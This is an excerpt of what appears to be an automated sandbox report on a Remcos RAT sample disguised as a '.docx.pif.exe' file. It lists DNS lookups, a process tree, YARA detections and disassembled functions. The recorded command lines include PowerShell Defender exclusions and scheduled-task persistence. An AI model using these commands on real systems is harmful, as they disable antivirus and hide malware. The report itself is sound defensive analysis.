Jul 3, 2024 08:59:23.328694105 CEST	1.1.1.1	192.168.2.5	0x7fe6	Name error (3)	www.vipguyclassproject2024.space	none	none	A (IP address)	IN (0x0001)	false
Jul 3, 2024 08:59:28.322148085 CEST	1.1.1.1	192.168.2.5	0x12dd	Name error (3)	www.vipguyclassproject2024.space	none	none	A (IP address)	IN (0x0001)	false
Jul 3, 2024 08:59:33.323002100 CEST	1.1.1.1	192.168.2.5	0x4a46	Name error (3)	www.vipguyclassproject2024.space	none	none	A (IP address)	IN (0x0001)	false
Jul 3, 2024 08:59:38.328473091 CEST	1.1.1.1	192.168.2.5	0xd9a7	Name error (3)	www.vipguyclassproject2024.space	none	none	A (IP address)	IN (0x0001)	false
Jul 3, 2024 08:59:43.427354097 CEST	1.1.1.1	192.168.2.5	0x1ad4	Name error (3)	www.vipguyclassproject2024.space	none	none	A (IP address)	IN (0x0001)	false
Jul 3, 2024 08:59:48.355978966 CEST	1.1.1.1	192.168.2.5	0x25fd	Name error (3)	www.vipguyclassproject2024.space	none	none	A (IP address)	IN (0x0001)	false
Jul 3, 2024 08:59:53.324678898 CEST	1.1.1.1	192.168.2.5	0x66c5	Name error (3)	www.vipguyclassproject2024.space	none	none	A (IP address)	IN (0x0001)	false
Jul 3, 2024 08:59:58.322719097 CEST	1.1.1.1	192.168.2.5	0x612b	Name error (3)	www.vipguyclassproject2024.space	none	none	A (IP address)	IN (0x0001)	false
Jul 3, 2024 09:00:03.323411942 CEST	1.1.1.1	192.168.2.5	0x468b	Name error (3)	www.vipguyclassproject2024.space	none	none	A (IP address)	IN (0x0001)	false
Jul 3, 2024 09:00:08.324614048 CEST	1.1.1.1	192.168.2.5	0x219a	Name error (3)	www.vipguyclassproject2024.space	none	none	A (IP address)	IN (0x0001)	false
Jul 3, 2024 09:00:13.323545933 CEST	1.1.1.1	192.168.2.5	0xab96	Name error (3)	www.vipguyclassproject2024.space	none	none	A (IP address)	IN (0x0001)	false
Jul 3, 2024 09:00:18.327438116 CEST	1.1.1.1	192.168.2.5	0xdb20	Name error (3)	www.vipguyclassproject2024.space	none	none	A (IP address)	IN (0x0001)	false
Jul 3, 2024 09:00:23.583151102 CEST	1.1.1.1	192.168.2.5	0xe2f4	Name error (3)	www.vipguyclassproject2024.space	none	none	A (IP address)	IN (0x0001)	false
Jul 3, 2024 09:00:28.325944901 CEST	1.1.1.1	192.168.2.5	0xeb7e	Name error (3)	www.vipguyclassproject2024.space	none	none	A (IP address)	IN (0x0001)	false

Target ID:	0
Start time:	02:56:20
Start date:	03/07/2024
Path:	C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c.docx.pif.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c.docx.pif.exe"
Imagebase:	0x3d0000
File size:	947'200 bytes
MD5 hash:	A048AFA687356F7D1B0FC9375CA13D06
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000000.00000002.2092193357.00000000037A6000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000000.00000002.2092193357.00000000037A6000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000000.00000002.2092193357.00000000037A6000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	02:56:22
Start date:	03/07/2024
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c.docx.pif.exe"
Imagebase:	0x7b0000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	02:56:22
Start date:	03/07/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	02:56:22
Start date:	03/07/2024
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\TkdxROLUOVpK.exe"
Imagebase:	0x7b0000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	02:56:22
Start date:	03/07/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	02:56:22
Start date:	03/07/2024
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\TkdxROLUOVpK" /XML "C:\Users\user\AppData\Local\Temp\tmpBE91.tmp"
Imagebase:	0x450000
File size:	187'904 bytes
MD5 hash:	48C2FE20575769DE916F48EF0676A965
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	02:56:22
Start date:	03/07/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	02:56:23
Start date:	03/07/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
Imagebase:	0x690000
File size:	2'625'616 bytes
MD5 hash:	0A7608DB01CAE07792CEA95E792AA866
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000009.00000002.4510842027.000000000504B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation:	moderate
Has exited:	false

Show Windows behavior

Target ID:	10
Start time:	02:56:23
Start date:	03/07/2024
Path:	C:\Users\user\AppData\Roaming\TkdxROLUOVpK.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Roaming\TkdxROLUOVpK.exe
Imagebase:	0x6c0000
File size:	947'200 bytes
MD5 hash:	A048AFA687356F7D1B0FC9375CA13D06
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000A.00000002.2131352258.0000000003AC6000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000000A.00000002.2131352258.0000000003AC6000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 0000000A.00000002.2131352258.0000000003AC6000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 66%, ReversingLabs Detection: 60%, Virustotal, Browse
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	02:56:24
Start date:	03/07/2024
Path:	C:\Windows\System32\wbem\WmiPrvSE.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Imagebase:	0x7ff6ef0c0000
File size:	496'640 bytes
MD5 hash:	60FF40CFD7FB8FE41EE4FE9AE5FE1C51
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	02:56:26
Start date:	03/07/2024
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\TkdxROLUOVpK" /XML "C:\Users\user\AppData\Local\Temp\tmpCDF3.tmp"
Imagebase:	0x450000
File size:	187'904 bytes
MD5 hash:	48C2FE20575769DE916F48EF0676A965
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	13
Start time:	02:56:26
Start date:	03/07/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	14
Start time:	02:56:26
Start date:	03/07/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
Imagebase:	0x690000
File size:	2'625'616 bytes
MD5 hash:	0A7608DB01CAE07792CEA95E792AA866
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	15
Start time:	02:56:26
Start date:	03/07/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
Imagebase:	0x690000
File size:	2'625'616 bytes
MD5 hash:	0A7608DB01CAE07792CEA95E792AA866
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000F.00000002.2107662526.00000000054E7000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: REMCOS_RAT_variants, Description: unknown, Source: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
Reputation:	moderate
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	11.8%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	181
Total number of Limit Nodes:	10

Executed Functions

Function 07569039 Relevance: 9.0, Strings: 7, Instructions: 292
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

!Y3E, xrefs: 07569142
$eq, xrefs: 075692D3
Teeq, xrefs: 075690BF
$eq, xrefs: 0756933D
Teeq, xrefs: 07569079
$eq, xrefs: 07569331
$eq, xrefs: 075692C7

Memory Dump Source

Source File: 00000000.00000002.2097571684.0000000007560000.00000040.00000800.00020000.00000000.sdmp, Offset: 07560000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7560000_#U8f6e#U6905-#U89c4#U683c.jbxd

Similarity

API ID:
String ID: !Y3E$Teeq$Teeq$$eq$$eq$$eq$$eq
API String ID: 0-3994094984
Opcode ID: 782bcb106594f1ae39e7cfff9dfdb6791c3a490db7ff05684b91f3143bcbbac7
Instruction ID: 98527d6ee28039fcb0a82015cf00baeeec4af8260a5f8bee05f6d37e0078b384
Opcode Fuzzy Hash: 782bcb106594f1ae39e7cfff9dfdb6791c3a490db7ff05684b91f3143bcbbac7
Instruction Fuzzy Hash: B8A1B0B4B102098FCB449B79C9597AE7BE3BBC8701F21846AE806DB394DF75EC058B41

Function 075607C8 Relevance: 7.0, Strings: 5, Instructions: 722COMMON

Download Yara Rule

Strings

(oeq, xrefs: 0756105B
,iq, xrefs: 07560DEF
(oeq, xrefs: 07561051
,iq, xrefs: 07560DDF
Hiq, xrefs: 075610C8

Memory Dump Source

Source File: 00000000.00000002.2097571684.0000000007560000.00000040.00000800.00020000.00000000.sdmp, Offset: 07560000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7560000_#U8f6e#U6905-#U89c4#U683c.jbxd

Similarity

API ID:
String ID: (oeq$(oeq$,iq$,iq$Hiq
API String ID: 0-2750058203
Opcode ID: 8ed65f3073800f2c8cbf4ba6cae2ded489379e7c2c0bd1b31bcd535774818308
Instruction ID: e888cb0d97b10b3aa6636af9b69cfb5e4b5cb5657e35fb3dbddf4051ca56963c
Opcode Fuzzy Hash: 8ed65f3073800f2c8cbf4ba6cae2ded489379e7c2c0bd1b31bcd535774818308
Instruction Fuzzy Hash: 065273B5B0051A9FDB54DF69C498EAEBBB2FF84350F158159E8059B3A0DB30EC42CB90

Function 07564A7C Relevance: 2.8, Strings: 2, Instructions: 284
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Teeq, xrefs: 07565205
Teeq, xrefs: 07565362

Memory Dump Source

Source File: 00000000.00000002.2097571684.0000000007560000.00000040.00000800.00020000.00000000.sdmp, Offset: 07560000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7560000_#U8f6e#U6905-#U89c4#U683c.jbxd

Similarity

API ID:
String ID: Teeq$Teeq
API String ID: 0-1240912287
Opcode ID: 985d7805214504a8f30ed16d9d868485f72fec41ac3a2c1c372bb8bc57ff5fa2
Instruction ID: f228e2a7c4931868991d7bd8246b09e4a063bbcf6eb983bc249bf40bfe03ed7e
Opcode Fuzzy Hash: 985d7805214504a8f30ed16d9d868485f72fec41ac3a2c1c372bb8bc57ff5fa2
Instruction Fuzzy Hash: DA814672B111259FC7049BA4DC049EFBFB6FF86362F01816BE602EB290D6318D058BE1

Function 075691DB Relevance: 2.7, Strings: 2, Instructions: 159
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$eq, xrefs: 07569331
$eq, xrefs: 075692C7

Memory Dump Source

Source File: 00000000.00000002.2097571684.0000000007560000.00000040.00000800.00020000.00000000.sdmp, Offset: 07560000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7560000_#U8f6e#U6905-#U89c4#U683c.jbxd

Similarity

API ID:
String ID: $eq$$eq
API String ID: 0-2246304398
Opcode ID: b54e77149813e14e35d2d0515e5385c9a0e5521bb08f6606b49d86672eefec1f
Instruction ID: 7ef555149733f114d8ba6a8f8671df81b58f728959e47fb7cabaccf6fc26fb5e
Opcode Fuzzy Hash: b54e77149813e14e35d2d0515e5385c9a0e5521bb08f6606b49d86672eefec1f
Instruction Fuzzy Hash: FE51C4B8B002099FDB049F75C9597AE7AA3FBC8700F21842AE906DB394DB76DC418B40

Function 075651E8 Relevance: 2.6, Strings: 2, Instructions: 133
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Teeq, xrefs: 07565205
Teeq, xrefs: 07565362

Memory Dump Source

Source File: 00000000.00000002.2097571684.0000000007560000.00000040.00000800.00020000.00000000.sdmp, Offset: 07560000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7560000_#U8f6e#U6905-#U89c4#U683c.jbxd

Similarity

API ID:
String ID: Teeq$Teeq
API String ID: 0-1240912287
Opcode ID: a9b798efec25ab7b4561d290621b7b0e35787ce570ca1c3ce6f876661a81b7d7
Instruction ID: 787e06fed7f320101a9cea90644331c5023329f738f148420be85c344ade6130
Opcode Fuzzy Hash: a9b798efec25ab7b4561d290621b7b0e35787ce570ca1c3ce6f876661a81b7d7
Instruction Fuzzy Hash: 2E41F571B600198FCB04DFA9C8596BFBBF7FB98300F11446AD606EB390DA319D058BA1

Function 075638D6 Relevance: 1.8, Strings: 1, Instructions: 562
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

D, xrefs: 075638DB

Memory Dump Source

Source File: 00000000.00000002.2097571684.0000000007560000.00000040.00000800.00020000.00000000.sdmp, Offset: 07560000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7560000_#U8f6e#U6905-#U89c4#U683c.jbxd

Similarity

API ID:
String ID: D
API String ID: 0-2746444292
Opcode ID: 52bc5068f77d66063e2e893888aa6d94c8219e7f7607cf368d4f8745ba00a228
Instruction ID: 6b2153bb163f373270c017d67b7ca32c923265e3dec5fe53160030f54ae8a151
Opcode Fuzzy Hash: 52bc5068f77d66063e2e893888aa6d94c8219e7f7607cf368d4f8745ba00a228
Instruction Fuzzy Hash: D352D8B4A102298FDB64DF28C998A9DBBB6FF89300F1041D9D509A7365DB34AEC1CF51

Function 0756DA88 Relevance: 1.4, Strings: 1, Instructions: 116COMMON

Download Yara Rule

Strings

T(z , xrefs: 0756DB77

Memory Dump Source

Source File: 00000000.00000002.2097571684.0000000007560000.00000040.00000800.00020000.00000000.sdmp, Offset: 07560000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7560000_#U8f6e#U6905-#U89c4#U683c.jbxd

Similarity

API ID:
String ID: T(z
API String ID: 0-3184255237
Opcode ID: 06304fd42bed75b1c5d33f89b36e8606d45da21d37cb85093b58df8caf4fcdcb
Instruction ID: 63b08f3b333124c848a32d293fd8f80659e41b3c6ee80a84327f4066cedfb931
Opcode Fuzzy Hash: 06304fd42bed75b1c5d33f89b36e8606d45da21d37cb85093b58df8caf4fcdcb
Instruction Fuzzy Hash: AE41E7B2F182059BDF588EA585556EFB6B6BBC9600F108C27D502AB394DE70CD018B51

Function 06AEBD00 Relevance: .5, Instructions: 501COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2096671603.0000000006AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ae0000_#U8f6e#U6905-#U89c4#U683c.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 29b0b5ac2516c8c26319b2d6994d7334a2a0e3b611639317fac72f207c77f659
Instruction ID: 00cb3274532921e21df6589dac91801613f8edef1930e714e4d163b06297d6c4
Opcode Fuzzy Hash: 29b0b5ac2516c8c26319b2d6994d7334a2a0e3b611639317fac72f207c77f659
Instruction Fuzzy Hash: 1C221731E006198FDB64EF69C88479DB7B1BF89314F1485A9D81AEB361DB30AE85CF50

Function 075669AA Relevance: .2, Instructions: 175COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2097571684.0000000007560000.00000040.00000800.00020000.00000000.sdmp, Offset: 07560000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7560000_#U8f6e#U6905-#U89c4#U683c.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1907a96c6310603e82d825fde839777106dab8b6cc02750b2c157b64b8a6c520
Instruction ID: 301d3007f8f4854662bd9dea8dda7022025411ea3d97a4dede7bd06bdb46c8a9
Opcode Fuzzy Hash: 1907a96c6310603e82d825fde839777106dab8b6cc02750b2c157b64b8a6c520
Instruction Fuzzy Hash: B561E4B1624101DFC714CF18D9884E9BBAAFB86351B47D856E406EF261DB34ED84CB85

Function 075669F0 Relevance: .2, Instructions: 174COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2097571684.0000000007560000.00000040.00000800.00020000.00000000.sdmp, Offset: 07560000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7560000_#U8f6e#U6905-#U89c4#U683c.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 349d03890f22028fa0514f8ffe23efde82f8c99dd3d130bf00f9db524e0555b7
Instruction ID: c690762680d076d5e05c391f98954835917bd4d6e82a10c030fd069812eec350
Opcode Fuzzy Hash: 349d03890f22028fa0514f8ffe23efde82f8c99dd3d130bf00f9db524e0555b7
Instruction Fuzzy Hash: 6661D6B1624101DFC714CF28D9884A97BBAFB86300F47D856E406DF2A1DB34ED85CB95

Function 075669EA Relevance: .2, Instructions: 169COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2097571684.0000000007560000.00000040.00000800.00020000.00000000.sdmp, Offset: 07560000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7560000_#U8f6e#U6905-#U89c4#U683c.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9f05064883a4d18f0af57cffad44e7f544228622dcdde206b8d9f8ea8327b8d8
Instruction ID: 18bfbfc3ca3ffd6024ba771d597a82616384305fde615a8d05a0a65d763d6d05
Opcode Fuzzy Hash: 9f05064883a4d18f0af57cffad44e7f544228622dcdde206b8d9f8ea8327b8d8
Instruction Fuzzy Hash: AC61C4B1624101DFC754CF18D9884A97BFAFB86300F479856E806DF2A1DB34ED84CB95

Function 0476AC62 Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2095006000.0000000004760000.00000040.00000800.00020000.00000000.sdmp, Offset: 04760000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4760000_#U8f6e#U6905-#U89c4#U683c.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a899aba1e788bdcb0c09e3b61788a3deda68fa46d40ce77f5d59ca5092296185
Instruction ID: 4814bb25d3ec06c4b6cd6cd9c6a2829706cafec79eee4974fd9bb896ae1add4e
Opcode Fuzzy Hash: a899aba1e788bdcb0c09e3b61788a3deda68fa46d40ce77f5d59ca5092296185
Instruction Fuzzy Hash: 83A00219EEE51480D0441C6201940B4C93F030B04CD123D090D1F733022400F044204C

Function 06AE5B20 Relevance: 2.7, Strings: 2, Instructions: 198
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Hiq, xrefs: 06AE5DC4
Hiq, xrefs: 06AE5D91

Memory Dump Source

Source File: 00000000.00000002.2096671603.0000000006AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ae0000_#U8f6e#U6905-#U89c4#U683c.jbxd

Similarity

API ID:
String ID: Hiq$Hiq
API String ID: 0-2624443307
Opcode ID: 690452b759d78161f36239327680967dfeb05a97e86dca84215cff04868d392e
Instruction ID: 4d76c8ff861c3e3e8b7f310d3c9618de54992f367773b2f69fee7891cf33b9cb
Opcode Fuzzy Hash: 690452b759d78161f36239327680967dfeb05a97e86dca84215cff04868d392e
Instruction Fuzzy Hash: 48715E34B002188FCB55EBA8C5949AE77F2FF89314B2544A9D502EB3A1CB36ED45CF61

Function 07569239 Relevance: 2.6, Strings: 2, Instructions: 138
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$eq, xrefs: 07569331
$eq, xrefs: 075692C7

Memory Dump Source

Source File: 00000000.00000002.2097571684.0000000007560000.00000040.00000800.00020000.00000000.sdmp, Offset: 07560000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7560000_#U8f6e#U6905-#U89c4#U683c.jbxd

Similarity

API ID:
String ID: $eq$$eq
API String ID: 0-2246304398
Opcode ID: 56d1c03259b35bae3a79c98b896fe7215f92b4711db56aa987b21d6c8d6379a7
Instruction ID: 9243231b89514aff861044c9b8f9c6884f41ac1168cd80bf83c6b75e91c33717
Opcode Fuzzy Hash: 56d1c03259b35bae3a79c98b896fe7215f92b4711db56aa987b21d6c8d6379a7
Instruction Fuzzy Hash: A451A378B002099FDB049F75C959BAE7AA3FFC8700F21842AE906DB394DB76DC018B50

Function 07569273 Relevance: 2.6, Strings: 2, Instructions: 136
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$eq, xrefs: 07569331
$eq, xrefs: 075692C7

Memory Dump Source

Source File: 00000000.00000002.2097571684.0000000007560000.00000040.00000800.00020000.00000000.sdmp, Offset: 07560000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7560000_#U8f6e#U6905-#U89c4#U683c.jbxd

Similarity

API ID:
String ID: $eq$$eq
API String ID: 0-2246304398
Opcode ID: 8141b20647a4a7b9c58c0b2f9618b6f8c6b8d98e4b242e46c4308119ab25490a
Instruction ID: 6bbba864523b8862f5a74196bb91c2b9993dcfd51904566ded71e0185734cf35
Opcode Fuzzy Hash: 8141b20647a4a7b9c58c0b2f9618b6f8c6b8d98e4b242e46c4308119ab25490a
Instruction Fuzzy Hash: 1A417178B002089FDB049F75C959BAE7AA3BFC8701F25846AE9069B7D4DB76DC018B50

Function 04767113 Relevance: 1.7, APIs: 1, Instructions: 245
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0476734E

Memory Dump Source

Source File: 00000000.00000002.2095006000.0000000004760000.00000040.00000800.00020000.00000000.sdmp, Offset: 04760000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4760000_#U8f6e#U6905-#U89c4#U683c.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 4d9ecd3f0d8c37fb9711d08133c912469ea1c1820d851ca8945eeae7a8b61dbb
Instruction ID: 11998a5b2c94bec5a78a97912c82e76cbbbab3775092789b89aa00e1f32b5422
Opcode Fuzzy Hash: 4d9ecd3f0d8c37fb9711d08133c912469ea1c1820d851ca8945eeae7a8b61dbb
Instruction Fuzzy Hash: F1916D71D002198FEB14CFA8C940BEDBBB2BF48314F14856AEC19A7394DB74A985CF91

Function 04767118 Relevance: 1.7, APIs: 1, Instructions: 243
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0476734E

Memory Dump Source

Source File: 00000000.00000002.2095006000.0000000004760000.00000040.00000800.00020000.00000000.sdmp, Offset: 04760000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4760000_#U8f6e#U6905-#U89c4#U683c.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: ba89db80497d7269d4d8085eb3a69a774975f76357906c6c0c06cbea37a4ee3b
Instruction ID: 0356439caf7d221b5adf8466ec8cdc4dc9af6389fbcce08d5ee405efc977ee27
Opcode Fuzzy Hash: ba89db80497d7269d4d8085eb3a69a774975f76357906c6c0c06cbea37a4ee3b
Instruction Fuzzy Hash: 73917B71D002198FEB14CFA8C940BEDBBB2BF48318F14856AEC19A7354DB74A985CF91

Function 027044B0 Relevance: 1.6, APIs: 1, Instructions: 96
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateActCtxA.KERNEL32(?), ref: 027059A9

Memory Dump Source

Source File: 00000000.00000002.2091609888.0000000002700000.00000040.00000800.00020000.00000000.sdmp, Offset: 02700000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2700000_#U8f6e#U6905-#U89c4#U683c.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: 4b09e94544e6b344d5b9f6e25191643ab7ed3d1baf396569b17e5d01e008bb1f
Instruction ID: a422f88232cdfda5d21d6614d2c52f6b865f6ca0105b660f39a6b21b730ce978
Opcode Fuzzy Hash: 4b09e94544e6b344d5b9f6e25191643ab7ed3d1baf396569b17e5d01e008bb1f
Instruction Fuzzy Hash: C341E3B0D10719CBDB24CFAAC984B9DBBF6BF48304F60816AD408BB251DB756949CF90

Function 02705A64 Relevance: 1.6, APIs: 1, Instructions: 92COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2091609888.0000000002700000.00000040.00000800.00020000.00000000.sdmp, Offset: 02700000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2700000_#U8f6e#U6905-#U89c4#U683c.jbxd

Similarity

API ID:
String ID:
API String ID:
